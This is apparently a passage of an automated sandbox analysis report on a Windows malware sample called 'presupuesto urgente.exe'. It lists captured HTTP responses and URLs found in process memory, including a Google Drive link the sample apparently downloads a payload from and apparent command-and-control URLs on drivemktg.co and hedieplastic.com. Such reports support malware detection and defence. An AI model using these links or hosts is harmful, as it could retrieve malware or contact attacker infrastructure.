        Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: hcdnDate: Fri, 04 Oct 2024 10:03:08 GMTContent-Type: text/htmlContent-Length: 149Connection: closeVary: Accept-EncodingCross-Origin-Embedder-Policy: require-corpCross-Origin-Opener-Policy: same-originCross-Origin-Resource-Policy: same-originPermissions-Policy: accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()Referrer-Policy: same-originX-Frame-Options: SAMEORIGINCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMTalt-svc: h3=":443"; ma=86400x-hcdn-request-id: 9aeb5fa323d8e82ef1c26dd1cee21776-bos-edge2Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 68 63 64 6e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>hcdn</center></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: hcdnDate: Fri, 04 Oct 2024 10:03:11 GMTContent-Type: text/htmlContent-Length: 149Connection: closeVary: Accept-EncodingCross-Origin-Embedder-Policy: require-corpCross-Origin-Opener-Policy: same-originCross-Origin-Resource-Policy: same-originPermissions-Policy: accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()Referrer-Policy: same-originX-Frame-Options: SAMEORIGINCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMTalt-svc: h3=":443"; ma=86400x-hcdn-request-id: 65c4a942774adc74f6804865fdc49307-bos-edge4Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 68 63 64 6e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>hcdn</center></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: hcdnDate: Fri, 04 Oct 2024 10:03:14 GMTContent-Type: text/htmlContent-Length: 4792Connection: closeVary: Accept-EncodingCross-Origin-Embedder-Policy: require-corpCross-Origin-Opener-Policy: same-originCross-Origin-Resource-Policy: same-originPermissions-Policy: accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()Referrer-Policy: same-originX-Frame-Options: SAMEORIGINCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMTalt-svc: h3=":443"; ma=86400x-hcdn-request-id: 58e7463fe1aea6dfc0061e5240fcba10-bos-edge1Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 68 65 63 6b 69 6e 67 20 79 6f 75 72 20 62 72 6f 77 73 65 72 20 62 65 66 6f 72 65 20 61 63 63 65 73 73 69 6e 67 2e 20 4a 75 73 74 20 61 20 6d 6f 6d 65 6e 74 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 6e 6f 66 6f 6c 6c 6f 77 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 33 30 22 3e 3c 73 74 79 6c 65 3e 64 69 76 7b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 6c 6f 61 64 65 72 7b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 77 69 64 74 68 3a 35 30 70 78 3b 70 61 64 64 69 6e 67 3a 38 70 78 3b 61 73 70 65 63 74 2d 72 61 74 69 6f 3a 31 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 35 30 25 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 32 35 62 30 39 62 3b 2d 2d 5f 6d 3a 63 6f 6e 69 63 2d 67 72 61 64 69 65 6e 74 28 Data Ascii: <html><head><title>Checking your browser before accessing. Just a moment...</title><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=Edge"><meta name="robots" content="noindex,nofollow"><meta http-equiv="refresh" content="30"><style>div{text-align:center}.loader{margin:auto;width:50px;padding:8px;aspect-ratio:1;border-radius:50%;background:#25b09b;--_m:conic-gradient(
        Source: global trafficHTTP traffic detected: HTTP/1.1 403 Forbiddencontent-length: 93cache-control: no-cachecontent-type: text/htmlconnection: closeData Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 52 65 71 75 65 73 74 20 66 6f 72 62 69 64 64 65 6e 20 62 79 20 61 64 6d 69 6e 69 73 74 72 61 74 69 76 65 20 72 75 6c 65 73 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 403 Forbiddencontent-length: 93cache-control: no-cachecontent-type: text/htmlconnection: closeData Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 52 65 71 75 65 73 74 20 66 6f 72 62 69 64 64 65 6e 20 62 79 20 61 64 6d 69 6e 69 73 74 72 61 74 69 76 65 20 72 75 6c 65 73 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 403 Forbiddencontent-length: 93cache-control: no-cachecontent-type: text/htmlconnection: closeData Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 52 65 71 75 65 73 74 20 66 6f 72 62 69 64 64 65 6e 20 62 79 20 61 64 6d 69 6e 69 73 74 72 61 74 69 76 65 20 72 75 6c 65 73 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 403 Forbiddencontent-length: 93cache-control: no-cachecontent-type: text/htmlconnection: closeData Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 52 65 71 75 65 73 74 20 66 6f 72 62 69 64 64 65 6e 20 62 79 20 61 64 6d 69 6e 69 73 74 72 61 74 69 76 65 20 72 75 6c 65 73 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 403 Forbiddencontent-length: 93cache-control: no-cachecontent-type: text/htmlconnection: closeData Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 52 65 71 75 65 73 74 20 66 6f 72 62 69 64 64 65 6e 20 62 79 20 61 64 6d 69 6e 69 73 74 72 61 74 69 76 65 20 72 75 6c 65 73 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 04 Oct 2024 10:04:57 GMTServer: ApacheX-Frame-Options: SAMEORIGINContent-Length: 16026X-XSS-Protection: 1; mode=blockConnection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 74 77 69 74 74 65 72 2d 62 6f 6f 74 73 74 72 61 70 2f 34 2e 31 2e 33 2f 63 73 73 2f 62 6f 6f 74 73 74 72 61 70 2e 6d 69 6e 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 68 61 6d 62 75 72 67 65 72 2d 6d 65 6e 75 22 3e 0a 20 20 3c 62 75 74 74 6f 6e 20 63 6c 61 73 73 3d 22 62 75 72 67 65 72 22 20 64 61 74 61 2d 73 74 61 74 65 3d 22 63 6c 6f 73 65 64 22 3e 0a 20 20 20 20 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 0a 20 20 3c 2f 62 75 74 74 6f 6e 3e 0a 3c 2f 64 69 76 3e 0a 0a 3c 6d 61 69 6e 3e 0a 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 72 6f 77 22 3e 0a 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 2d 6d 64 2d 36 20 61 6c 69 67 6e 2d 73 65 6c 66 2d 63 65 6e 74 65 72 22 3e 0a 20 20 20 20 20 20 20 20 3c 73 76 67 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 78 6d 6c 6e 73 3a 78 6c 69 6e 6b 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 6c 69 6e 6b 22 0a 20 20 20 20 20 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 38 30 30 20 36 30 30 22 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 67 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 65 66 73 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 63 6c 69 70 50 61
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 04 Oct 2024 10:14:52 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 79 36 69 7a 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /y6iz/ was not found on this server.</p></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 403 Forbiddencontent-length: 93cache-control: no-cachecontent-type: text/htmlconnection: closeData Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 52 65 71 75 65 73 74 20 66 6f 72 62 69 64 64 65 6e 20 62 79 20 61 64 6d 69 6e 69 73 74 72 61 74 69 76 65 20 72 75 6c 65 73 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>
        Source: winrs.exe, 00000004.00000002.12652275172.0000000005136000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://297-tamaki-drive-auckland-au-1071-sales.properties.sothebysrealty.com
        Source: presupuesto urgente.exe, 00000002.00000003.8264232862.0000000003555000.00000004.00000020.00020000.00000000.sdmp, presupuesto urgente.exe, 00000002.00000003.8073579084.0000000003556000.00000004.00000020.00020000.00000000.sdmp, presupuesto urgente.exe, 00000002.00000003.8263999040.0000000003549000.00000004.00000020.00020000.00000000.sdmp, presupuesto urgente.exe, 00000002.00000002.8362184008.0000000003556000.00000004.00000020.00020000.00000000.sdmp, presupuesto urgente.exe, 00000002.00000003.8073912459.0000000003556000.00000004.00000020.00020000.00000000.sdmp, presupuesto urgente.exe, 00000002.00000003.8106252124.0000000003550000.00000004.00000020.00020000.00000000.sdmp, presupuesto urgente.exe, 00000002.00000003.8106400648.0000000003555000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
        Source: presupuesto urgente.exe, 00000002.00000003.8264232862.0000000003555000.00000004.00000020.00020000.00000000.sdmp, presupuesto urgente.exe, 00000002.00000003.8073579084.0000000003556000.00000004.00000020.00020000.00000000.sdmp, presupuesto urgente.exe, 00000002.00000003.8263999040.0000000003549000.00000004.00000020.00020000.00000000.sdmp, presupuesto urgente.exe, 00000002.00000002.8362184008.0000000003556000.00000004.00000020.00020000.00000000.sdmp, presupuesto urgente.exe, 00000002.00000003.8073912459.0000000003556000.00000004.00000020.00020000.00000000.sdmp, presupuesto urgente.exe, 00000002.00000003.8106252124.0000000003550000.00000004.00000020.00020000.00000000.sdmp, presupuesto urgente.exe, 00000002.00000003.8106400648.0000000003555000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
        Source: qnFwqCOYxcUlZ.exe, 00000003.00000002.12660760663.0000000007E30000.00000004.80000000.00040000.00000000.sdmp, winrs.exe, 00000004.00000002.12652275172.0000000005910000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://drivemktg.co/d29x/?aPfP=cNoDEx_hrvchZzh&PbG=EJApT75eZmuARDHui1yiUSFGw/auBgA1VuCz8HY4d23k1MTOG
        Source: presupuesto urgente.exe, 00000002.00000001.8031630233.0000000000649000.00000020.00000001.01000000.00000007.sdmpString found in binary or memory: http://inference.location.live.com11111111-1111-1111-1111-111111111111https://partnernext-inference.
        Source: presupuesto urgente.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
        Source: qnFwqCOYxcUlZ.exe, 00000003.00000002.12650331699.000000000143B000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.drivemktg.co
        Source: qnFwqCOYxcUlZ.exe, 00000003.00000002.12650331699.000000000143B000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.drivemktg.co/d29x/
        Source: presupuesto urgente.exe, 00000002.00000001.8031630233.0000000000649000.00000020.00000001.01000000.00000007.sdmpString found in binary or memory: http://www.gopher.ftp://ftp.
        Source: qnFwqCOYxcUlZ.exe, 00000003.00000002.12660760663.0000000007B0C000.00000004.80000000.00040000.00000000.sdmp, winrs.exe, 00000004.00000002.12652275172.00000000055EC000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.hedieplastic.com
        Source: presupuesto urgente.exe, 00000002.00000001.8031630233.0000000000626000.00000020.00000001.01000000.00000007.sdmpString found in binary or memory: http://www.ibm.com/data/dtd/v11/ibmxhtml1-transitional.dtd-//W3O//DTD
        Source: presupuesto urgente.exe, 00000002.00000003.8264232862.0000000003555000.00000004.00000020.00020000.00000000.sdmp, presupuesto urgente.exe, 00000002.00000003.8073579084.0000000003556000.00000004.00000020.00020000.00000000.sdmp, presupuesto urgente.exe, 00000002.00000003.8263999040.0000000003549000.00000004.00000020.00020000.00000000.sdmp, presupuesto urgente.exe, 00000002.00000002.8362184008.0000000003556000.00000004.00000020.00020000.00000000.sdmp, presupuesto urgente.exe, 00000002.00000003.8073912459.0000000003556000.00000004.00000020.00020000.00000000.sdmp, presupuesto urgente.exe, 00000002.00000003.8106252124.0000000003550000.00000004.00000020.00020000.00000000.sdmp, presupuesto urgente.exe, 00000002.00000003.8106400648.0000000003555000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.quovadis.bm0
        Source: presupuesto urgente.exe, 00000002.00000001.8031630233.00000000005F2000.00000020.00000001.01000000.00000007.sdmpString found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd
        Source: presupuesto urgente.exe, 00000002.00000001.8031630233.00000000005F2000.00000020.00000001.01000000.00000007.sdmpString found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd
        Source: winrs.exe, 00000004.00000003.8586851291.0000000008432000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
        Source: presupuesto urgente.exe, 00000002.00000003.8073579084.0000000003556000.00000004.00000020.00020000.00000000.sdmp, presupuesto urgente.exe, 00000002.00000003.8073912459.0000000003556000.00000004.00000020.00020000.00000000.sdmp, presupuesto urgente.exe, 00000002.00000003.8073579084.0000000003549000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://apis.google.com
        Source: winrs.exe, 00000004.00000003.8586851291.0000000008432000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
        Source: qnFwqCOYxcUlZ.exe, 00000003.00000002.12660760663.0000000006E7C000.00000004.80000000.00040000.00000000.sdmp, winrs.exe, 00000004.00000002.12652275172.000000000495C000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/gsap/3.1.1/gsap.min.js
        Source: qnFwqCOYxcUlZ.exe, 00000003.00000002.12660760663.0000000006E7C000.00000004.80000000.00040000.00000000.sdmp, winrs.exe, 00000004.00000002.12652275172.000000000495C000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css
        Source: qnFwqCOYxcUlZ.exe, 00000003.00000002.12660760663.0000000006E7C000.00000004.80000000.00040000.00000000.sdmp, winrs.exe, 00000004.00000002.12652275172.000000000495C000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/4.1.3/css/bootstrap.min.css
        Source: presupuesto urgente.exe, 00000002.00000002.8361386340.00000000034F2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/
        Source: presupuesto urgente.exe, 00000002.00000002.8361386340.00000000034F2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/pYX)
        Source: presupuesto urgente.exe, 00000002.00000002.8361386340.00000000034F2000.00000004.00000020.00020000.00000000.sdmp, presupuesto urgente.exe, 00000002.00000002.8361338809.0000000003490000.00000004.00001000.00020000.00000000.sdmp, presupuesto urgente.exe, 00000002.00000002.8361386340.0000000003509000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1lijlSqItQAppMrLvYydriCj6BfDO7ozU
        Source: presupuesto urgente.exe, 00000002.00000002.8361386340.0000000003509000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1lijlSqItQAppMrLvYydriCj6BfDO7ozUaE
        Source: presupuesto urgente.exe, 00000002.00000003.8264232862.0000000003555000.00000004.00000020.00020000.00000000.sdmp, presupuesto urgente.exe, 00000002.00000003.8263999040.0000000003549000.00000004.00000020.00020000.00000000.sdmp, presupuesto urgente.exe, 00000002.00000002.8362184008.0000000003556000.00000004.00000020.00020000.00000000.sdmp, presupuesto urgente.exe, 00000002.00000003.8106252124.0000000003550000.00000004.00000020.00020000.00000000.sdmp, presupuesto urgente.exe, 00000002.00000003.8106400648.0000000003555000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/
        Source: presupuesto urgente.exe, 00000002.00000003.8264232862.0000000003555000.00000004.00000020.00020000.00000000.sdmp, presupuesto urgente.exe, 00000002.00000003.8263999040.0000000003549000.00000004.00000020.00020000.00000000.sdmp, presupuesto urgente.exe, 00000002.00000002.8362184008.0000000003556000.00000004.00000020.00020000.00000000.sdmp, presupuesto urgente.exe, 00000002.00000003.8106252124.0000000003550000.00000004.00000020.00020000.00000000.sdmp, presupuesto urgente.exe, 00000002.00000003.8106400648.0000000003555000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/7F
        Source: presupuesto urgente.exe, 00000002.00000003.8264232862.0000000003555000.00000004.00000020.00020000.00000000.sdmp, presupuesto urgente.exe, 00000002.00000003.8263999040.0000000003549000.00000004.00000020.00020000.00000000.sdmp, presupuesto urgente.exe, 00000002.00000002.8362184008.0000000003556000.00000004.00000020.00020000.00000000.sdmp, presupuesto urgente.exe, 00000002.00000003.8106252124.0000000003550000.00000004.00000020.00020000.00000000.sdmp, presupuesto urgente.exe, 00000002.00000003.8106400648.0000000003555000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/CGW)
        Source: presupuesto urgente.exe, 00000002.00000003.8264232862.0000000003555000.00000004.00000020.00020000.00000000.sdmp, presupuesto urgente.exe, 00000002.00000003.8073579084.0000000003556000.00000004.00000020.00020000.00000000.sdmp, presupuesto urgente.exe, 00000002.00000003.8263999040.0000000003549000.00000004.00000020.00020000.00000000.sdmp, presupuesto urgente.exe, 00000002.00000003.8263739558.0000000003536000.00000004.00000020.00020000.00000000.sdmp, presupuesto urgente.exe, 00000002.00000003.8263739558.000000000352D000.00000004.00000020.00020000.00000000.sdmp, presupuesto urgente.exe, 00000002.00000002.8361890120.0000000003536000.00000004.00000020.00020000.00000000.sdmp, presupuesto urgente.exe, 00000002.00000002.8362184008.0000000003556000.00000004.00000020.00020000.00000000.sdmp, presupuesto urgente.exe, 00000002.00000003.8263739558.000000000353B000.00000004.00000020.00020000.00000000.sdmp, presupuesto urgente.exe, 00000002.00000003.8073912459.0000000003556000.00000004.00000020.00020000.00000000.sdmp, presupuesto urgente.exe, 00000002.00000003.8106252124.0000000003550000.00000004.00000020.00020000.00000000.sdmp, presupuesto urgente.exe, 00000002.00000003.8106400648.0000000003555000.00000004.00000020.00020000.00000000.sdmp, presupuesto urgente.exe, 00000002.00000003.8264089347.000000000352D000.00000004.00000020.00020000.00000000.sdmp, presupuesto urgente.exe, 00000002.00000002.8361890120.000000000352F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1lijlSqItQAppMrLvYydriCj6BfDO7ozU&export=download
        Source: presupuesto urgente.exe, 00000002.00000003.8264232862.0000000003555000.00000004.00000020.00020000.00000000.sdmp, presupuesto urgente.exe, 00000002.00000003.8263999040.0000000003549000.00000004.00000020.00020000.00000000.sdmp, presupuesto urgente.exe, 00000002.00000002.8362184008.0000000003556000.00000004.00000020.00020000.00000000.sdmp, presupuesto urgente.exe, 00000002.00000003.8106252124.0000000003550000.00000004.00000020.00020000.00000000.sdmp, presupuesto urgente.exe, 00000002.00000003.8106400648.0000000003555000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1lijlSqItQAppMrLvYydriCj6BfDO7ozU&export=downloadm
        Source: 16-84-3.4.drString found in binary or memory: https://duckduckgo.com/ac/?q=
        Source: winrs.exe, 00000004.00000003.8590352688.00000000084A7000.00000004.00000020.00020000.00000000.sdmp, winrs.exe, 00000004.00000003.8586851291.0000000008432000.00000004.00000020.00020000.00000000.sdmp, 16-84-3.4.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
        Source: 16-84-3.4.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
        Source: winrs.exe, 00000004.00000003.8586851291.0000000008432000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gemini.google.com/app?q=
        Source: presupuesto urgente.exe, 00000002.00000001.8031630233.0000000000649000.00000020.00000001.01000000.00000007.sdmpString found in binary or memory: https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214
        Source: winrs.exe, 00000004.00000003.8582122558.00000000032AD000.00000004.00000020.00020000.00000000.sdmp, winrs.exe, 00000004.00000003.8582423969.00000000032CA000.00000004.00000020.00020000.00000000.sdmp, winrs.exe, 00000004.00000002.12649540671.00000000032CA000.00000004.00000020.00020000.00000000.sdmp, winrs.exe, 00000004.00000003.8582122558.00000000032A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/
